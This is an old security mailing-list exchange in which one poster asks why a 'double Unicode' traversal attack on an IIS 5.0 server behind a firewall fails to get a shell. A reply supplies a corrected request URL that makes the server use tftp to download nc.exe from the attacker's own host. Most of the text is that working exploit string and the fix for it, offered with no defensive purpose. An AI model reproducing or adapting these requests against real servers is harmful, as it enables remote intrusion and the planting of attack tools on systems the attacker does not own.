> -----Original Message----- > From: Gaziel, Avishay [mailto:[EMAIL PROTECTED]] > Sent: Tuesday, July 09, 2002 9:33 AM > To: [EMAIL PROTECTED] > Subject: Can't get a shell > > > Hi All, > Situation: > An IIS5.0 vulnerable to unicode.("double Unicode" i.e. ..%255c.. etc.) > IIS sitting behind a firewall. > Problem: > host/scripts/..%255c.........../winnt/system32/cmd.exe?/tftp+-i+my > server+get+nc.exe doesn't work
Here is the correct format: host/scripts/..%255c.........../winnt/system32/tftp?+"-i"+myserver+GET+nc.ex e notice that cmd.exe is removed and that -i is quoted "-i" that should fix your problem R, Coral ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
